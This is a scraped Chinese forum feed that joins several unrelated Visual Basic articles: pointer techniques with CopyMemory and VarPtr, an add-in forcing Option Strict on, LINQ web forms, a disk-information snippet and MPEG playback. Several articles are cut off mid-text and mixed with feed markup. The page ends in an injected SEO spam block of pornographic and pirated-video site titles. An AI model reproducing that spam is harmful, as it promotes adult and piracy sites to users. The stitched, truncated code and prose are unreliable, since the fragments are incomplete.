    想當年東方不敗,黑木崖密室一戰,僅憑一根繡花針獨戰四大高手,神出鬼沒,堪稱天下武林第一高手。若想成為VB里的東方不敗,熟習VB《葵花寶典》,掌握VB指針技術,乃是不二的法門。
    欲練神功,引刀……,其實掌握VB指針技術,并不需要那么痛苦。因為說穿了,也就那么幾招,再勤加練習,終可至神出鬼沒之境。廢話少說,讓我們先從指針的定義說起。
   
    一、指針是什么?
    不需要去找什么標準的定義,它就是一個32位整數,在C語言和在VB里都可以用Long類型來表示。在32位Windows平臺下它和普通的32位長整型數沒有什么不同,只不過它的值是一個內存地址,正是因為這個整數象針一樣指向一個內存地址,所以就有了指針的概念。
    有統計表明,很大一部分程序缺陷和內存的錯誤訪問有關。正是因為指針直接和內存打交道,所以指針一直以來被看成一個危險的東西。以至于不少語言,如著名的JAVA,都不提供對指針操作的支持,所有的內存訪問方面的處理都由編譯器來完成。而象C和C++,指針的使用則是基本功,指針給了程序員極大的自由去隨心所欲地處理內存訪問,很多非常巧妙的東西都要依靠指針技術來完成。
    關于一門高級的程序設計語言是不是應該取消指針操作,關于沒有指針操作算不算一門語言的優點,我在這里不討論,因為互聯網上關于這方面的沒有結果的討論,已經造成了占用幾個GB的資源。無論最終你是不是要下定決心修習指針技術《葵花寶典》,了解這門功夫總是有益處的。
    注意:在VB里,官方是不鼓勵使用什么指針的,本文所講的任何東西你都別指望取得官方的技術支持,一切都要靠我們自己的努力,一切都更刺激!
    讓我們開始神奇的VB指針探險吧!

 

   順便提一下,聽說VB.NET里沒有這幾個函數,但只要還能調用API,我們就可以試試上面的幾個聲明,這樣在VB.NET里我們一樣可以進行指針操作。
    但是請注意,如果通過API調用來使用VarPtr,整個程序二SwapPtr將比原來使用內置VarPtr函數時慢6倍。)
    如果你喜歡刨根問底,那么下面就是VarPtr函數在C和匯編語言里的樣子:
    在C里樣子是這樣的:
    long VarPtr(void* pv){
        return (long)pv;
    }
    所對就的匯編代碼就兩行:
    mov         eax,dword ptr [esp+4]
    ret         4           '彈出棧里參數的值并返回。
    之所以讓大家了解VarPtr的具體實現,是想告訴大家它的開銷并不大,因為它們不過兩條指令,即使加上參數賦值、壓棧和調用指令,整個獲取指針的過程也就六條指令。當然,同樣的功能在C語言里,由于語言的直接支持,僅需要一條指令即可。但在VB里,它已經算是最快的函數了,所以我們完全不用擔心使用VarPtr會讓我們失去效率!速度是使用指針技術的根本要求。
    一句話,VarPtr返回的是變量所在處的內存地址,也可以說返回了指向變量內存位置的指針,它是我們在VB里處理指針最重要的武器之一。

3、ByVal和ByRef
    ByVal傳遞的參數值,而ByRef傳遞的參數的地址。在這里,我們不用去區別傳指針/傳地址/傳引用的不同,在VB里,它們根本就是一個東西的三種不同說法,即使VB的文檔里也有地方在混用這些術語(但在C++里的確要區分指針和引用)
    初次接觸上面的程序二SwapPtr的朋友,一定要搞清在里面的CopyMemory調用中,在什么地方要加ByVal,什么地方不加(不加ByVal就是使用VB缺省的ByRef)
    準確的理解傳值和傳地址(指針)的區別,是在VB里正確使用指針的基礎。
    現在一個最簡單的實驗來看這個問題,如下面的程序三:
【程序三】:'體會ByVal和ByRef
    Sub TestCopyMemory()
        Dim k As Long
        k = 5
Note:   CopyMemory ByVal VarPtr(k), 40000, 4
        Debug.Print k
    End Sub
    上面標號Note處的語句的目的,是將k賦值為40000,等同于語句k=40000,你可以在"立即"窗口試驗一下,會發現k的值的確成了40000。
    實際上上面這個語句,翻譯成白話,就是從保存常數40000的臨時變量處拷貝4個字節到變量k所在的內存中。
    現在我們來改變一個Note處的語句,若改成下面的語句:
Note2:   CopyMemory ByVal VarPtr(k), ByVal 40000, 4
    這句話的意思就成了,從地址40000拷貝4個字節到變量k所在的內存中。由于地址40000所在的內存我們無權訪問,操作系統會給我們一個Access Violation內存越權訪問錯誤,告訴我們"試圖讀取位置0x00009c40處內存時出錯,該內存不能為'Read'"。
    我們再改成如下的語句看看。
Note3:   CopyMemory VarPtr(k), 40000, 4
    這句話的意思就成了,從保存常數40000的臨時變量處拷貝4個字節到到保存變量k所在內存地址值的臨時變量處。這不會出出內存越權訪問錯誤,但k的值并沒有變。
    我們可以把程序改改以更清楚的休現這種區別,如下面的程序四:
【程序四】:'看看我們的東西被拷貝到哪兒去了
    Sub TestCopyMemory()
        Dim i As Long, k As Long
        k = 5
        i = VarPtr(k)
NOTE4:  CopyMemory i, 40000, 4
        Debug.Print k
        Debug.Print i
        i = VarPtr(k)
NOTE5:  CopyMemory ByVal i, 40000, 4
        Debug.Print k
    End Sub

程序輸出:
5
40000
40000
    由于NOTE4處使用缺省的ByVal,傳遞的是i的地址(也就是指向i的指針),所以常量40000拷貝到了變量i里,因此i的值成了40000,而k的值卻沒有變化。但是,在NOTE4前有:i=VarPtr(k),本意是要把i本身做為一個指針來使用。這時,我們必須如NOTE5那樣用ByVal來傳遞指針i,由于i是指向變量k的指針,所以最后常量40000被拷貝了變量k里。
    希望你已經理解了這種區別,在后面問題的討論中,我還會再談到它。

4、AddressOf
    它用來得到一個指向VB函數入口地址的指針,不過這個指針只能傳遞給API使用,以使得API能回調VB函數。
    本文不準備詳細討論函數指針,關于它的使用請參考VB文檔。

5、拿來主義。
    實際上,有了CopyMemory,VarPtr,AddressOf這三把斧頭,我們已經可以將C里基本的指針操作拿過來了。
    如下面的C程序包括了大部分基本的指針指針操作:
    struct POINT{
        int x; int y;
    };
    int Compare(void* elem1, void* elem2){}
    void PtrDemo(){
    //指針聲明:
        char c = 'X';        //聲明一個char型變量
        char* pc; long* pl;  //聲明普通指針
        POINT* pPt;          //聲明結構指針
        void* pv;            //聲明無類型指針
        int (*pfnCastToInt)(void *, void*);//聲明函數指針:
    //指針賦值:
       pc = &c;              //將變量c的地址值賦給指針pc
       pfnCompare = Compare; //函數指針賦值。
    //指針取值:
       c = *pc;              //將指針pc所指處的內存值賦給變量c
    //用指針賦值:
       *pc = 'Y'             //將'Y'賦給指針pc所指內存變量里。
    //指針移動:
       pc++; pl--;
    }

    這些對指針操作在VB里都有等同的東西,
    前面討論ByVal和ByRef時曾說過傳指針和傳地址是一回事,實際上當我們在VB里用缺省的ByRef聲明函數參數時,我們已經就聲明了指針。
    如一個C聲明的函數:long Func(char* pc)
    其對應的VB聲明是:Function Func(pc As Byte) As Long
    這時參數pc使用缺省的ByRef傳地址方式來傳遞,這和C里用指針來傳遞參數是一樣。
    那么怎么才能象C里那樣明確地聲明一個指針呢?
    很簡單,如前所說,用一個32位長整數來表達指針就行。在VB里就是用Long型來明確地聲明指針,我們不用區分是普通指針、無類型指針還是函數指針,通通都可用Long來聲明。而給一個指針賦值,就是賦給它用VarPar得到的另一個變量的地址。具體見程序五。
【程序五】:同C一樣,各種指針。
    Type POINT
        X As Integer
        Y As Integer
    End Type
    Public Function Compare(elem1 As Long, elem2 As Long) As Long
    '
    End Function
    Function FnPtrToLong(ByVal lngFnPtr As Long) As Long
        FnPtrToLong = lngFnPtr
    End Function
    Sub PtrDemo()
       Dim l As Long, c As Byte, ca() As Byte, Pt As POINT
       Dim pl As Long, pc As Long, pv As Long, pPt As Long, pfnCompare As Long
       c = AscB("X")
       pl = VarPtr(l)     '對應C里的long、int型指針
       pc = VarPtr(c)     '對應char、short型指針
       pPt = VarPtr(Pt)   '結構指針
       pv = VarPtr(ca(0)) '字節數組指針,可對應任何類型,也就是void*
       pfnCompare = FnPtrToLong(AddressOf Compare) '函數指針
       CopyMemory c, ByVal pc, LenB(c)   '用指針取值
       CopyMemory ByVal pc, AscB("Y"), LenB(c) '用指針賦值
       pc = pc + LenB(c) : pl = pl - LenB(l)   '指針移動
    End Sub
    我們看到,由于VB不直接支持指針操作,在VB里用指針取值和用指針賦值都必須用CopyMemory這個API,而調用API的代價是比較高的,這就決定了我們在VB里使用指針不能象在C里那樣自由和頻繁,我們必須要考慮指針操作的代價,在后面的"指針應用"我們會再變談這個問題。
    程序五中關于函數指針的問題請參考VB文檔,無類型指針void*會在下面"關于Any的問題"里說。
    程序五基本上已經包括了我們能在VB里進行的所有指針操作,僅此而已。

    下面有一個小測試題,如果現在你就弄懂了上面程咬金的三板斧,你就應該能做得出來。
    上面提到過,VB.NET中沒有VarPtr,我們可以用聲明API的方式來引入MSVBVM60.DLL中的VarPtr,F在的問題如果不用VB的運行時DLL文件,你能不能自己實現一個ObjPtr。答案在下一節后給出。

    四、指針使用中應注意的問題
    1、關于ANY的問題
    如果以一個老師的身份來說話,我會說:最好永遠也不要用Any!是的,我沒說錯,是永遠!所以我沒有把它放在程咬金的三板斧里。當然,這個問題和是不是應該使用指針這個問題一樣會引發一場沒有結果的討論,我告訴你的只是一個觀點,因為有時我們會為了效率上的一點點提高或想偷一點點懶而去用Any,但這樣做需要要承擔風險。
    Any不是一個真正的類型,它只是告訴VB編譯器放棄對參數類型的檢查,這樣,理論上,我們可以將任何類型傳遞給API。
    Any在什么地方用呢?讓我們來看看,在VB文檔里的是怎么說的,現在就請打開MSDN(Visual Studio 6自帶的版本),翻到"Visual Basic文檔"->"使用Visual Basic"->"部件工具指南"->"訪問DLL和Windows API"部分,再看看"將 C 語言聲明轉換為 Visual Basic 聲明"這一節。文檔里告訴我們,只有C的聲明為LPVOID和NULL時,我們才用Any。實際上如果你愿意承擔風險,所有的類型你都可以用Any。當然,也可以如我所說,永遠不要用Any。   
    為什么要這樣?那為什么VB官方還要提供Any?是信我的,還是信VB官方的?有什么道理不用Any?
    如前面所說,VB官方不鼓勵我們使用指針。因為VB所標榜的優點之一,就是沒有危險的指針操作,所以的內存訪問都是受VB運行時庫控制的。在這一點上,JAVA語言也有著同樣的標榜。但是,同JAVA一樣,VB要避免使用指針而得到更高的安全性,就必須要克服沒有指針而帶來的問題。VB已經盡最大的努力來使我們遠離指針的同時擁有強類型檢查帶來的安全性。但是操作系統是C寫的,里面到處都需要指針,有些指針是沒有類型的,就是C程序員常說的可怕的void*無類型指針。它沒有類型,因此它可以表示所有類型。如CopyMemory所對應的是C語言的memcpy,它的聲明如下:
    void *memcpy( void *dest, const void *src, size_t count );
    因memcpy前兩個參數用的是void*,因此任何類型的參數都可以傳遞給他。
    一個用C的程序員,應該知道在C函數庫里這樣的void*并不少見,也應該知道它有多危險。無論傳遞什么類型的變量指針給上面memcpy的void*,C編譯器都不會報錯或給任何警告。
    在VB里大多數時候,我們使用Any就是為了使用void*,和在C里一樣,VB也不對Any進行類型檢查,我們也可以傳遞任何類型給Any,VB編譯器也都不會報錯或給任何警告。
    但程序運行時會不會出錯,就要看使用它時是不是小心了。正因為在C里很多錯誤是和void*相關的,所以,C++鼓勵我們使用satic_cast<void*>來明確指出這種不安全的類型的轉換,已利于發現錯誤。
    說了這么多C/C++,其實我是想告訴所有VB的程序員,在使用Any時,我們必須和C/C++程序員使用void*一樣要高度小心。
    VB里沒有satic_cast這種東西,但我們可以在傳遞指針時明確的使用long類型,并且用VarPtr來取得參數的指針,這樣至少已經明確地指出我們在使用危險的指針。如程序二經過這樣的處理就成了下面的程序:
【程序五】:'使用更安全的CopyMemory,明確的使用指針!
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)
    Sub SwapStrPtr2(sA As String, sB As String)
        Dim lTmp As Long
        Dim pTmp As Long, psA As Long, psB As Long
        pTmp = VarPtr(lTmp): psA = VarPtr(sA): psB = VarPtr(sB)
        CopyMemory pTmp, psA, 4
        CopyMemory psA, psB, 4
        CopyMemory psB, pTmp, 4
    End Sub
   

]]>
如何將Option Strict的設置保持為On(Add-In技術)-.NET教程,VB.Net語言http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2593&Page=1wangxinxin2010-12-14 12:21:55在一次vsm的專訪中,dan appleman提到:“我希望visual studio 項目能夠在缺省狀態下將option strict設置為on,而無需用手工編輯向導模板!笨赡芎芏喑绦騿T都會認同dan的觀點-- 在vb.net實現中,將option strict off設置成缺省狀態是mircosoft一大錯舉。但事實上你不必非得按照microsoft的這一設定。在以下這個技巧中,我會介紹如何建立一個自動將option strict設置為on的add-in方法(用這個方法你可能都會忘記如何使用手動添加了)。

第一步是通過使用add-in wizard來建立一個新的visual studio add-in 項目,并將其命名為vboptionstricton。當向導建好了這個add-in 并打開了connect.vb模塊的代碼窗口之后,你可以在這個connect類中聲明兩個類級(class-level) 變量。你需要將向導定義的這兩個變量:dim applicationobject as envdte.dte
dim addininstance as envdte.addin

用以下兩個變量聲明來取代:private _app as envdte.dte
private withevents _solutionevents as solutionevents

接下來,在public onconnection 的事件處理(event handler)中將向導生成的代碼:applicationobject = ctype(application, envdte.dte)
addininstance = ctype(addininst, envdte.addin)

用以下兩個給變量賦值的語句來取代:_app = ctype(application, envdte.dte)
_solutionevents = _app.events.solutionevents

然后,在solution explorer中選擇vboptionstricton項目,并通過在add reference 對話框的.net tab里選擇vslangproj assembly來添加一個reference。同時,在connect.vb模塊的代碼頂部加上imports vslangproj語句。 vslangproj assembly提供了名為prjoptionstrict的列舉(enumeration),其中包含optionstrict的可能值(on, off)。

現在你可以開始將option strict設置成on了。整個add-in 過程包括四個加入到connect類的小的vb.net子過程。add-in過程不需要用戶進行干涉因而無需使用用戶界面。前兩個過程是同一個方法的重載(overload):public sub setoptionstricton()
   dim proj as project
    check and set optionstrict for each project in
    the open solution by calling an overloaded
    version of this sub.
   for each proj in ctype(_app.getobject("vbprojects") _
      , projects)
      call setoptionstricton(proj)
   next
end sub

public sub setoptionstricton(byref proj as project)
   dim propoptionstrict as [property]
   with proj
      propoptionstrict = _
         .properties.item("optionstrict")
       if optionstrict not "on"...
      if ctype(propoptionstrict.value, _
         prjoptionstrict) <> _
         prjoptionstrict.prjoptionstricton then

          set opti.
         propoptionstrict.value = _
            prjoptionstrict.prjoptionstricton
         .save() save changes to the project.
      end if
   end with proj
end sub

通過使用上述重載,你可以得到兩種方法(用最少的重復代碼):一個將open solution中所有項目的option strict設置成on的不帶參數的方法和另一個將單獨指定項目中的option strict設置成on的帶proj參數的方法。

接下來建后兩個過程。每個過程各調用一個setoptionstricton方法:private sub _solutionevents_opened() _
   handles _solutionevents.opened
      call setoptionstricton()
   end sub

   private sub _solutionevents_projectadded( _
      byval project as envdte.project) handles _
      _solutionevents.projectadded

      call setoptionstricton(project)
   end sub

打開visual studio中的一個solution將會觸發第一個事件處理(_solutionevents_opened),激活add-in會確保當前vb項目中的option strict被設置成on。這些項目可能是在你安裝add-in之前就建好的,也可能是從一個沒有裝這個add-in的其他開發者那里拿來的。在將一個新的或是以前建好的項目加入到當前的solution中后會觸發另一個事件處理(_solutionevents_projectadded),當你用項目向導在新建的solution中加入一個項目模板時也會觸發這一事件。這一處理確保在所有新建vb項目中的option strict是on的狀態。]]>
用VB語言,在Web開發中使用LINQhttp://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2592&Page=1wangxinxin2010-12-14 12:18:08網絡有很多偉大的創新,能夠很容易利用LINQ的查詢能力,并使之與Web用戶界面的豐富新和靈活性相結合.的確很容易.

  在開始之前你需要弄明白幾個概念:

  * LinqDataSource 控件 -- 允許你在基于Web的數據綁定中使用LINQ查詢作為數據源. 
  * LinqDataSource.Selecting 事件 -- 允許你自定義任意LINQ定義查詢(包括匿名查詢) 為數據源. 只要從VB編輯器的下拉列表中選中LinqDataSource并選擇Selecting事件, 然后在事件處理代碼中設定e.Result = <你的LINQ查詢> 即可.
  * OR設計器和Linq 到SQL -- 如果你正用LINQ查詢直接連接到SQL數據庫 (而不是對象集合, xml, 等等) 上, 這是一種創建查詢的簡單方法, 我們稱它為DataContext 對象. “OR”是對象-關系映射的縮寫, 例如, 從關系數據庫數據到.NET對象的映射
  * ASP.NET 數據綁定表達式 -- 使你能夠計算由數據源字段, 或簡單控件的屬性, 或控件列表而來的ASP形式的<%# Eval("YOURFIELD") %>表達式

  用LINQ到SQL創建一個簡單的Web窗體

  第一篇文章用一個最簡單的Web窗體, 來逐一解釋這些概念. 然后我將根據你們的回復在以后的文章中添加更多主題并擴展這個示例.

  下面是一個最初我們需要的Web窗體輸出示例 -- 一個非常簡單的人力資源程序的員工列表單 -- 我得承認它缺少修飾, 并需要一些用戶界面上的加工:
<!-- Code highlighting produced by Actipro CodeHighlighter (freeware) http://www.CodeHighlighter.com/ -->EmployeeID: 2 Andrew Fuller Andrew received his BTS commercial in 1974 and a Ph.D. in international marketing from the University of Dallas in 1981. He is fluent in French and Italian and reads German. He joined the company as a sales representative, was promoted to sales manager in January 1992 and to vice president of sales in March 1993. Andrew is a member of the Sales Management Roundtable, the Seattle Chamber of Commerce, and the Pacific Rim Importers Association. EmployeeID: 1 Nancy Davolio Education includes a BA in psychology from Colorado State University in 1970. She also completed "The Art of the Cold Call." Nancy is a member of Toastmasters International.
  如果你對Visual Studio非常熟悉, 我估計你只要10到15分鐘就能在你自己的機器上實現.
  準備

  - 確保已經安裝Visual Studio 2008 或 Visual Web Developer 2008 Express. Express 版本.
  - 確保安裝了 SQL Server 2005 Express 并已啟動. 它通常在安裝VS 或VS Express的同時默認被安裝. 你也可以從這里下載安裝.
  - 如果在你的機器上沒有Northwind.mdf, 可以從這篇文章的附件中下載.
  為網站添加數據

  首先我們要把數據庫添加到我們的工程中, 并創建必要的類以使用LINQ中的數據庫 (用Linq到SQL).注意, 你可以選擇跳過此步驟并創建你自己的LINQ查詢到其他數據庫上.

  通過File -> New Web Site ... -> ASP.NET Web Site創建一個新的網站到本地目錄 
   把Northwind數據庫添加到網站的App_Data文件夾
  1. 從本文附件中下載 Northwind.mdf 文件并保存到本地硬盤
  2. 把這個文件拖放到解決方案管理器的App_Data文件夾中

  通過OR設計器為Northwind創建LINQ到 SQL的類. Linq 到 SQL 類會被保存在一個.dbml 文件中并可以在可視的OR設計器中打開.

  1. 在解決方案資源管理器中右鍵單擊網站結點, 選擇快捷菜單的Add New Item -> Linq To SQL Classes
  2. 把"DataClasses.dbml" 重命名為"NorthwindDataClasses.dbml". (這樣做很重要, 以便在代碼和VS向導中找到這些類).
  3.
]]>
VB中獲取邏輯磁盤的信息http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2591&Page=1wangxinxin2010-12-14 12:15:38        List1.AddItem "剩余字節數: "
& Format(FreeBytes, "#,0")
If SysFlags And FS_CASE_IS_PRESERVED Then
List1.AddItem "文件名的大小寫記錄于文件系統"
        End If
        If SysFlags And FS_CASE_SENSITIVE Then
            List1.AddItem "文件名要區分大小寫"
        End If
        If SysFlags And FS_UNICODE_STORED_
ON_DISK Then
            List1.AddItem "文件名保存為 Unicode 格式"
        End If
        If SysFlags And FS_PERSISTENT_ACLS Then
            List1.AddItem "文件系統支持文件的訪問
      控制列表(ACL)安全機制"
        End If
        If SysFlags And FS_FILE_COMPRESSION Then
      List1.AddItem "文件系統支持逐文件地進行文件壓縮"
        End If
        If SysFlags And FS_VOL_IS_COMPRESSED Then
            List1.AddItem "整個磁盤卷都是壓縮的"
        End If
    End If
End Sub

Private Sub Form_Load()
    Call Drive1_Change
End Sub

  運行后,選擇驅動器列表框中的不同驅動器,列表框中就會顯示出該驅動器的相應信息。以上程序在VB5.0、VB6.0及WINDOWS 98中運行通過。
   

 

]]>
Visual Basic環境下Video/ Audio壓縮數據流播放技術http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2590&Page=1wangxinxin2010-12-14 12:14:01國防科技大學
--------------------------------------------------------------------------------
---- 1. 引言

---- 銀行的數字化監視監控系統是目前比較有市場及應用前景的開發項目,基于不同的MPEG采集卡與硬件外圍設備開發的監視監控系統在國內外都有比較成型的技術。為了滿足實時監視、實時采集壓縮、隨時回放、壓縮數據流的傳播等具體要求,在該系統中使用了一種用于網絡視頻/音頻多點傳輸(視頻廣播)的視頻數據采集卡,提供AVI(MPEG I Frame壓縮編碼)采集、MPG采集。發送端廣播MPEG流,接受端接受MPEG流并顯示,網絡傳輸采用WinSock 2 IP-Multicast。如果本機為發送端,網絡上另外任何一臺PC可以作為接收端。只要指定不同端口號,同時可以有多臺PC機作為發送端,多臺PC機作為接收端接收不同發送端的視頻數據,也可在傳送數據的同時在本機將數據存為MPEG文件。本文主要介紹在VB的環境下開發MPEG卡采集的Audio/Video數據播放的一些編程技巧。

---- 2. MPEG的內容與發展簡介

---- 多媒體信息主要包括圖像、聲音和文本三大類。其中視頻、音頻等信號的信息量是非常大的,而且這些信息的表達方式、輸入、輸出的要求也各不同。對這些數據進行有效的表達和適當處理是很重要的,它使多媒體信息壓縮技術成為多媒體通信領域中的關鍵技術之一。ISO與IEC于1988年聯合成立的MPEG(Moving Picture Expert Group),致力于運動圖像及其伴音編碼的全球標準化工作。它包括MPEG系統:MPEG視頻、MPEG音頻。為了推動社會由文本信息時代向多媒體信息時代過渡,ISO繼MPEG-1、2和4后又推出了MPEG-7。

---- MPEG-1制定于1993年(ISO/IEC 11172),是針對1.5Mbit/s以下數據傳輸率的數字存儲媒質運動圖像及其伴音編碼的國際標準。視頻壓縮率為26:1。MPEG-2制定于1995年(ISO/IEC 13818),是CCIR601建議的圖像質量DVB、HDTV和DVD制定的3-10Mbit/s的運動圖像及其伴音編碼的國際標準。與前面基于信息論的波形編碼理論,針對一定比特率的視頻、音頻編碼的MPEG標準不同的是,于1998年11月公布的國際標準MPEG-4更加注重多媒體系統的交互性和靈活性。它引入AV對象(Audio/Visual Objects),使得更多的交互操作成為可能。1998年10月國際標準化組織又推出了MPEG-7的構想,預計于2001年初最終完成并公布,其正式名稱為"多媒體內容描述接口"(Multimedia Content Description Interface)。它提出了一種適用于現實生活中的各種多媒體內容的標準化描述方案,以提取待描述對象的各方面特征為基礎,方便人們對所需的多媒體材料進行快速、有效的檢索。

---- 3.VB開發MPEG -- Audio/Video數據流的播放技術

---- 3.1.VB中Multimedia MCI 控件,MediaPlayer控件播放MPEG數據流的缺點

---- VB中常用的多媒體控件是Multimedia MCI 控件,它管理媒體控制接口 (MCI) 設備上的多媒體文件的記錄與回放。它被用來向諸如聲卡、MIDI 序列發生器、CD-ROM 驅動器、視頻 CD 播放器和視頻磁帶記錄器及播放器等設備發出 MCI 命令,還支持 Windows (*.avi) 視頻文件的回放。采用Multimedia MCI 控件播放采集的MPEG數據流,播放速度比實時監控顯示要快,在測試時還發現MPEG文件長度縮短到500k-600k時,就無法看到播出的圖像了。改用VB中的MediaPlayer控件上敘缺點仍然存在。分析原因是:因為MPEG文件長度太短了,播放設備剛打開就已經關閉了,這是編程無法控制的。而且,對于用戶要求獲取的某些有關壓縮數據流的信息和希望實現的某些功能,比如圖線尺寸、Copmression Rate、圖形的縮放顯示、界面的美觀等,上敘控件所提供的為方便程序開發人員使用的高層接口已不適用,要想在此基礎上實現對底層的一些操作,難度可想而知。在解決上敘實際性問題時,我們調用了動態鏈接庫Quatrz.dll。

---- 3.2.提供對MPEG流方便的底層操作和高層接口的動態鏈接庫Quatrz.dll

---- 在Windows\System下可找到一個動態鏈接庫Quatrz.dll,這是Windows中帶的用于控制運動圖像的播放的一個類型庫,只要在VB的"引用"菜單中將它添加進來即可使用。該庫中定義了IBasicAudio,IBasicVideo和IBasicVideo2,IMediaEvent 、IMediaEventEx、IMediaPosition等類,可方便地在CommandButton控件的Click等事件中添加代碼設置和讀取Audio的相關值,設置或讀取Video的輸入輸出源的相關參數,直接調用無參函數Run、Pause、Stop等控制播放事件進程,利用IMediaPosition類對具體播放細節進行操作。對于壓縮的MPEG數據流的輸出顯示并不需要特別的控件,在VisualBasic中你可以選擇一個窗體作為容器或窗體上的PictureBox控件作為容器。為了界面的美觀和用戶查取相關信息的方便,我們采用了PictureBox控件作為容器顯示播放的MPEG數據流。

---- 3.3.用PictureBox控件顯示MPEG數據流

---- Visual Basic中PictureBox 控件可以顯示來自位圖、圖標或者元文件,以及來自增強的元文件、JPEG 或 GIF 文件的圖形。亦可在代碼中操作圖形屬性和方法,以創建動畫或進行仿真。在窗體上放置了一個PictureBox控件picTV,在調用了Windows\System下動態鏈接庫Quatrz.dll的基礎上,定義一個全局的Object對象pMC,令 pMC指向 FilgraphManager的一個新實例,打開壓播放的MPEG文件;再定義一個局部對象 pVW 為 IVideoWindow的新實例,打開一個播放Video的窗口;令pVW = pMC,給對象引用pVW賦值,將picTV的屬性值hWnd賦給pVW的Owner ,這樣picTV就能顯示接收的MPEG數據流了。具體操作如下:

Set pMC = New FilgraphManager
pMC.RenderFile "C:\Bank\Montior\Example.MPG"
Set pVW = pMC
pVW.WindowStyle = CLng(&H6000000)
pVW.Left = 0
pVW.Top = 0
OldWidth = pVW.width
OldHeight = pVW.Height
picTV.width = pVW.width * 15
picTV.Height = pVW.Height * 15
pVW.Owner = picTV.hWnd
---- 可以單獨定義一個函數包括這些代碼,也可將其放到CommandButton控件的Click事件中。
---- 3.4.MPEG數據流的縮放顯示

---- 放大或縮小MPEG圖像是各種多媒體播放軟件中常用的圖像顯示處理手段。VisualBasic中對于靜態圖片進行縮放處理可以使用Image控件,將控件的Stretch屬性設為True,則裝入的圖片會改變比例適應Image控件的范圍,因此對圖片的縮放處理變成對Image控件的Height、Width屬性值的大小變化。由于控件的尺寸發生變化,顯示的點距不能改變,造成顯示點的像素點與圖片不能完全一一對應,顯示質量明顯變差。只有Image控件才能對圖片進行縮放,如果PictureBox控件不足以顯示整幅圖象,則裁剪圖象以適應控件的大小。要想實現用PictureBox控件實現對輸出MPEG圖像的縮放,必須改變MPEG數據流的輸出比例,在調節PictureBox控件的尺寸去適應輸出的MPEG圖像。實際上,在上面的第3小節里,為了顯示輸出MPEG圖像已經這樣做了。只不過用的是讀取出的MPEG圖像OldWidth、 OldHeight,下面給出一個以原來的1/2大小輸出MPEG圖像的例子。

pVW.width = OldWidth / 2
pVW.Height = OldHeight / 2
picTV.Left = 135
picTV.Top = 135
picTV.width = pVW.width * 15
picTV.Height = pVW.Height * 15
pVW.Owner = picTV.hWnd

---- 在放大或縮小MPEG圖像的尺寸時要注意保持Width、Height的比例一致,以免輸出的圖像變形。
---- 3.5.鼠標拖動播放MPEG數據流

---- 用鼠標拖動滾動條隨意播放MPEG數據流是Windows中多媒體播放機播放VCD的常用技術。VB中的Slider 控件是包含滑塊和可選擇性刻度標記的窗口,可以通過拖動滑塊,用鼠標單擊滑塊的任意一側或者使用鍵盤移動滑塊。在選擇離散數值或某個范圍內的一組連續數值時,Slider 控件十分有用。通過將滑塊移動到刻度標記處,可以對MPEG數據流進行定位播放。在窗體上放置一個Slider 控件Slider 1,設置好光標移動的最大步長LargeChange=5,最小步長SmallChange=1,最大移動范圍Max=50,實現程序如下:

Private Sub Slider1_Scroll()
'
Dim pMP As IMediaPosition
Dim v As Double

If Not bOpen Then Exit Sub

bSeeking = True
pMC.Pause

Set pMP = pMC

v = Slider1.Value - Slider1.Min
v = v / Slider1.Max * pMP.Duration
pMP.CurrentPosition = v
Set pMP = Nothing

pMC.Run
'
End Sub

---- 3.6.MPEG數據流采集時間的獲取
---- VisualBasic里提供了一個函數FileDateTime可用來獲取文件建立或是更新的日期與時間。定義一個局部對象 pMP 為IMediaPosition的新實例,令pMP = pMC,給對象引用pMP賦值;再定義兩個Double型的變量curpos 、length,將pMP.CurrentPosition賦給curpos,取得MPEG數據流的當前相對位置時間,將pMP.Duration 賦給length,取得MPEG數據流的時間長度值;就能獲取MPEG數據流相對的采集時間。根據MPEG采集文件建立的特性將兩個日期時間作加法或減法則可以得到MPEG數據流的采集時間。

---- 在整個MPEG的播放過程中,都要求實時顯示MPEG數據流的采集時間,可定義一個獲取采集時間的函數,采用Timer控件的Timer事件來驅動。通過引發 Timer 事件,Timer 控件可以有規律地隔一段時間執行一次函數獲取到MPEG數據流的采集時間。

---- 4.結束語

---- 將成熟的圖像壓縮技術用于電視監視監控領域具有十分重要的意義。例如:在銀行的監視監控系統中,由于客戶(銀行)身份的特殊性,在對冒領他人存款、銀行失竊或被搶劫等擾亂銀行正常工作秩序的事件的調查及其處理中,采集的壓縮數據流是很重要的辦案線索與證據。在該系統中不僅要求監視畫面清晰,采集的數據冗余度低,MPEG數據流的播放技術也是很重要的。本文介紹了在Windows環境下,利用VisualBasic自身條件和原有控件開發MPEG卡采集的Audio/Video數據的播放技術。充分利用了VB的優越條件,靈活地與VB中各種現有控件結合,開發出來的MPEG媒體播放器功能完善,回放的MPEG畫面能清晰地重現數據采集時場景、做到了"聞其聲,見其人"、并能準確確定事件發生的時間時刻。對只記錄了單幀的Audio/Video數據流也能同樣播放。上述技術已在監控系統中使用,并效果良好。 ]]>
主站蜘蛛池模板: 极品丝袜乱系列大全集目录| 69堂在线观看| 日韩欧美精品在线视频| 免费a级毛片无码av| 色www永久免费视频| 国产美女一级毛片| 三级网站免费观看| 97影院九七理论片男女高清| 日韩精品无码一区二区三区AV| 免费一级毛片在线视频观看| 老妇高潮潮喷到猛进猛出| 国产精品va在线观看手机版| www国产精品| 成人性爱视频在线观看| 亚洲AV午夜成人片| 欧美性猛交xxxx免费看手交| 午夜亚洲乱码伦小说区69堂| 蜜桃视频在线观看免费网址入口| 国产精品白丝AV网站| 一本色道无码不卡在线观看| 无翼乌日本漫画| 亚洲一区二区三区在线播放| 欧美福利在线播放| 制服丝袜怡红院| 美女黄色免费网站| 国产成人无码av在线播放不卡| 99久久精品免费看国产 | 4444www免费看| 在线精品91青草国产在线观看| 中文字幕在线免费观看| 日本a∨在线播放高清| 亚洲av本道一区二区三区四区| 欧美成人高清ww| 免费午夜爽爽爽WWW视频十八禁| 精品综合久久久久久8888 | 国产精品亚洲综合一区在线观看| poren日本| 好大好硬好爽免费视频| 久久www视频| 日本一在线中文字幕天堂| 亚洲av无码片在线播放|